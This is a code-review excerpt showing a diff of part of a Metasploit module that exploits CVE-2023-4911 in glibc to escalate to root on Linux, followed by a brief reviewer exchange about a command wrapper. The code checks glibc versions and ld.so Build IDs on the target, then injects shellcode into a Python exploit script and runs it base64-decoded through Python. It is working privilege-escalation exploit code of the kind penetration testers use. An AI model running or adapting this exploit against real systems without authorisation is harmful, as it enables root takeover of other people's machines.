modules/exploits/linux/local/glibc_tunables_priv_esc.rb

```diff
@@ -0,0 +1,175 @@
+        return CheckCode::Appears("The glibc version (#{glibc_version}) found on the target appears to be vulnerable")
+      end
+    else
+      return CheckCode::Unknown('The module has not been tested against this Linux distribution')
+    end
+    CheckCode::Safe("The glibc version (#{glibc_version}) found on the target does not appear to be vulnerable")
+  end
+
+  def check_ld_so_build_id
+    # Check to ensure the python exploit has the magic offset defined for the BuildID for ld.so
+    if command_exists?('file ')
+      file_cmd_output = ''
+
+      # This needs to be split up by distro as Ubuntu has readlink and which installed by default but "ld.so" is not
+      # defined on the path like it is on Debian. Also Ubuntu doesn't have ldconfig install by default.
+      sysinfo = get_sysinfo
+      case sysinfo[:distro]
+      when 'ubuntu'
+        if command_exists?('ldconfig') && command_exists?('grep')
+          (file_cmd_output = cmd_exec('file $(ldconfig -p | grep -oE "/.*ld-linux.*so\.[0-9]*")'))
+        end
+      when 'debian'
+        if command_exists?('which') && command_exists?('readlink')
+          (file_cmd_output = cmd_exec('file "$(readlink -f "$(which ld.so)")"'))
+        end
+      else
+        fail_with(Failure::NoTarget, 'The module has not been tested against this Linux distribution')
+      end
+
+      if file_cmd_output =~ /BuildID\[.+\]=(\w+),/
+        build_id = Regexp.last_match(1)
+        if BUILD_IDS.include?(build_id)
+          print_good("The Build ID for ld.so: #{build_id} is in the list of supported Build IDs for the exploit.")
+        else
+          fail_with(Failure::NoTarget, "The Build ID for ld.so: #{build_id} is not in the list of supported Build IDs for the exploit.")
+        end
+      else
+        print_warning('Unable to verify the BuildID for ld.so, the exploit has a chance of being incompatible with this target.')
+      end
+    else
+      print_warning('Unable to locate the commands the target in order to verify the BuildID for ld.so, the exploit has a chance of being incompatible with this target.')
+    end
+  end
+
+  def exploit
+    fail_with(Failure::BadConfig, 'Session already has root privileges') if is_root?
+
+    check_ld_so_build_id
+
+    python_binary = find_exec_program
+    fail_with(Failure::NotFound, 'The python binary was not found.') unless python_binary
+    vprint_status("Using '#{python_binary}' to run the exploit")
+
+    # The python script assumes the working directory is the one we can write to.
+    cd(datastore['WritableDir'])
+    shell_code = payload.encoded.unpack('H*').first
+    exploit_data = exploit_data('CVE-2023-4911', 'cve_2023_4911.py').gsub('METASPLOIT_SHELL_CODE', shell_code)
+
+    # If there is no response from cmd_exec after the brief 15s timeout, this indicates exploit is running successfully
+    output = cmd_exec("$(echo #{Rex::Text.encode_base64(exploit_data)} |base64 -d | #{python_binary})")
```

Comment:
Why wrap the command in `$(…)`? `cmd_exec` alone should be working, no?

Reply:
Yup my mistake, that was unnecessarily copy and pasted over from testing.